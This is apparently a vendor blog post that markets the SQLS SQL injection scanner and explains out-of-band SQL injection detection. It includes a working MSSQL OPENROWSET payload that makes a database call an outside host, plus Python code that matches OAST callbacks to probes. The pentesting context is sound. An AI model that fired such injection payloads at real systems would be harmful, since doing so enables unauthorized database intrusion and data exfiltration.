Hunting Down Out-of-Band (OOB) SQL Injection Vulnerabilities With SQLS
SQLS (SQLSCANNER) is a powerful SQL Injection scanner that employs five distinct techniques to identify Full and Blind (including Time-based & Out-of-Band) SQL injection vulnerabilities. Powered by SQLMap, it offers comprehensive coverage for detecting CWE-89 issues that you can't find with other traditional tools.
As penetration testers, our main goal is to identify as many potential security vulnerabilities in our targets as possible. Often working against tight deadlines, most pentesters have to rely on automated tooling to still get every component tested.
But what if these automated tools have limitations, or can't provide coverage for certain unique cases? We've run into these common challenges too, and we are solving them (and continue to) with the BLACKBIRD Pentesting Suite.
Understanding Out-of-Band (OOB) SQL Injection
Out-of-band (OOB) vulnerabilities are generally harder to spot because detecting them requires an external server. The root cause is a vulnerable component within a system or application that lets attackers trigger outbound network connections (such as DNS queries or HTTP requests) to an arbitrary destination (for example, a self-deployed OAST server).
If you'd like to dive deeper into what Out-of-Band (OOB) vulnerabilities are, we highly recommend you refer to this article: What Are Out-of-Band (OOB) Web Security Vulnerabilities?
Out-of-band (OOB) SQL injection vulnerabilities revolve around sending a malicious payload that tricks the database into making an external DNS query or HTTP request.
Here is an example of an OOB SQL Injection payload for Microsoft SQL Server (MSSQL):
1'; SELECT * FROM OPENROWSET('SQLOLEDB', '//demo.x7.rs', 'SELECT 1')
Traditional SQL injection vulnerability scanners often lack coverage for blind out-of-band SQL injection vulnerabilities, largely because detecting them requires an external OAST server.
BLACKBIRD is a pentesting suite that comes out of the box with a managed OAST server on a 4-character domain, so we decided to close this gap, and we have.
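A scanner only gets to call an injection point out-of-band vulnerable when a callback carrying that probe's unique canary label actually arrives at the OAST server. The correlation step below is an added example written for this article, not SQLS, SQLMap or BLACKBIRD code; it assumes the x7.rs zone from the payload above as the OAST domain, a constructed interaction log format, and probe records built in the test rather than by the scanner.

```python
import secrets
from dataclasses import dataclass

OAST_DOMAIN = "x7.rs"  # taken from the article's example payload; a real deployment uses its own zone


@dataclass
class Probe:
    target: str      # URL under test
    parameter: str   # injected parameter
    technique: str   # e.g. "mssql-openrowset"
    token: str       # unique canary label, one per injection point


def new_probe(target, parameter, technique):
    # 16 hex chars per probe, so one callback maps to exactly one injection point
    return Probe(target, parameter, technique, secrets.token_hex(8))


def callback_host(probe):
    """Hostname the payload for this probe should make the database contact."""
    return f"{probe.token}.{OAST_DOMAIN}"


def parse_interaction(line):
    """Parse one constructed log line: '<proto> <timestamp> <queried-name> <source-ip>'."""
    parts = line.split()
    if len(parts) != 4:
        return None  # not an interaction record, skip it
    proto, ts, name, src = parts
    # DNS names arrive in any case and often with a trailing dot; normalise both
    return {"proto": proto.lower(), "ts": ts, "name": name.lower().rstrip("."), "src": src}


def correlate(probes, interaction_lines):
    """Return (probe, [interactions]) pairs for every probe whose canary label was seen."""
    by_token = {p.token: p for p in probes}
    hits = {}
    for line in interaction_lines:
        rec = parse_interaction(line)
        if rec is None or not rec["name"].endswith("." + OAST_DOMAIN):
            continue
        # Walk every label, not just the leftmost: some payloads prepend
        # extra labels (e.g. "<data>.<token>.<zone>") in front of the canary.
        for label in rec["name"].split("."):
            if label in by_token:
                hits.setdefault(label, []).append(rec)
    return [(by_token[t], recs) for t, recs in hits.items()]
```

The same matching logic, pointed at your own egress DNS or proxy logs instead of the OAST dashboard, tells you when a database server resolved a name it had no business resolving.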
Introducing SQLS: The Managed SQL Injection (SQLi) Vulnerability Scanner
SQLS is a powerful SQL Injection vulnerability scanner that deploys 5 attack techniques to identify full and blind (such as Time-based & Out-of-Band) SQL injection vulnerabilities. It is powered by an open-source, reputable tool, SQLMap.
We've built further upon SQLMap to integrate with your private OAST server that comes out of the box with your BLACKBIRD license. This integration allowed us to add new payloads to SQLMap to help detect Out-of-Band (OOB) SQL injection vulnerabilities, a blind type of SQLi vulnerability that's often missed by pentesters.
SQLS also includes advanced payloads with Web Application Firewall (WAF) bypasses for popular firewalls like Cloudflare, Akamai, etc., further increasing your coverage and helping you find more SQLi vulnerabilities.
BLACKBIRD OAST Server Integration
Your OAST Server is a managed private OAST server that can be set up in less than a minute. We host your OAST server so that you do not have to take care of it. All you have to do is pick a canary token that you like.
Afterward, you can easily receive DNS, HTTP and HTTPS invocations and consult them right from your dashboard!
Want to learn more? Read the documentation or explore the interactive demo!
Conclusion
Out-of-band (OOB) vulnerabilities are generally harder to spot, but that doesn't have to be the case! As a pentester, you should equip yourself with the latest and most capable pentesting tools to significantly reduce your chances of missing security vulnerabilities!
You can try out SQLS completely free for 7 days! All you have to do is start your trial, and you can cancel at any moment from your profile!